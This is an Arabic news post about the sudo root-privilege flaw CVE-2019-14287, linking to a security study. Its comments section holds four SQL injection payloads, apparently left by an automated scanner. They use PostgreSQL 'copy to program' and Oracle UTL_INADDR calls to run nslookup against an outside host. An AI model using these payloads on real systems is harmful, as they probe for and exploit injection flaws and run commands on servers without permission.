ثغرة في sudo تسمح لمستخدمي Linux بتنفيذ الأوامر بصلاحيات root

(0)

2019/11/13 - 10:37


أصدر مركز  أمن المعلومات دراسة مقتضبة عن ثغرة أمنية جديدة فيSudo[الثغرة،المعرفة بالرقم CVE-2019-14287] -إحدى أهم الأدوات المساعدةوالأكثر استخداماً والتي تأتي بمثابة أداة أساسية مثبتة على كل نظام تشغيل مبني على نظامي التشغيل UNIX و Linux تقريباً.

نبهت الدراسة إلى خطورة هذه الثغرة في إمكانية تخطّيها  لسياسة الأمان في أداة  sudo والتي تمكنهاأن تسمح لمستخدم أو برنامج خبيث بتنفيذ أوامر اختيارية بصلاحيات root حتى عندما تمنع إعدادات “sudoers” الحصول على صلاحيات root.

للإطلاع على هذه الدراسةمن خلال الرابط التالي: ثغرة أمنية جديدة في Sudo   

                                                                  

اترك تعليقاً


27-11-2019

1';copy (select '') to program 'nslookup dns.sqli.\013405.81-425.81.1cdc9.\1.bxss.me

27-11-2019

1;copy (select '') to program 'nslookup dns.sqli.\013405.81-423.81.1cdc9.\1.bxss.me'

27-11-2019

'||UTL_INADDR.get_host_address('dns.'||'sqli.013405.81-419.81.1cdc9.1.bxss'||'.me')||'

27-11-2019

1||UTL_INADDR.get_host_address('dns.'||'sqli.013405.81-417.81.1cdc9.1.bxss'||'.me')